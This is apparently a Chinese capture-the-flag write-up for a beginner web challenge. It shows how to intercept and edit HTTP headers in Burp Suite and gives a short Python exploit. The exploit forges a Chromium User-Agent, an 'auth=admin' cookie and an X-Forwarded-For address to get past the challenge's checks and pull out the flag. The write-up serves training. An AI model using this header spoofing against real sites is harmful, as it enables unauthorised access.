HTTP1

背景

在访问某些网页时，有时会遇到需要修改HTTP请求头的情况。请求头中可能包含诸如Cookie、User-Agent等信息，这些信息可能会被服务器用来进行身份验证或者其他的检查。

例如，服务器可能会检查User-Agent来确定请求是否来自特定的浏览器，或者检查Cookie的值来确定用户是否已经登录。在这种情况下，需要拦截并修改这些请求头才能绕过这些限制。

以下是如何使用拦截代理工具Burp Suite来修改请求头的步骤：

1. 首先，需要设置浏览器的代理设置，使其流量通过Burp Suite。
2. 然后，在Burp Suite中打开”Intercept”选项卡，并确保”Intercept is on”被选中。
3. 现在，在浏览器中发送请求时，这些请求会被Burp Suite拦截。
4. 在”Intercept”选项卡中，可以看到被拦截的请求。可以在这里修改请求头，例如改变User-Agent或者Cookie的值。
5. 修改完成后，点击”Forward”按钮，修改后的请求就会被发送到服务器。

思路

查看文章详细内容，得到通关要求

• 参数要求host=cs, port=sec
• 只接受POST请求访问，表单数据要求target=2024
• 只允许Chromium访问
• 需要admin权限
• 只允许110.191.22.76访问

因此，需要修改访问时 HTTP 请求头的信息，可以通过 BurpSuite 拦截流量并修改请求头，也可以使用 Python 直接编写 exp：

import requests
import re

target = "http://ctf.seek2.top:32769/post/post.php"
headers = {
    'User-Agent': 'Chromium',
    'Cookie': 'auth=admin',
    'X-Forwarded-For': '110.191.22.76'
}
params = {
    'host': 'cs', 'port': 'sec'
}
data = {'target': '2024'}
url = target

html = requests.post(url, data=data, params=params, headers=headers).text
print(re.findall(r'flag.*', html))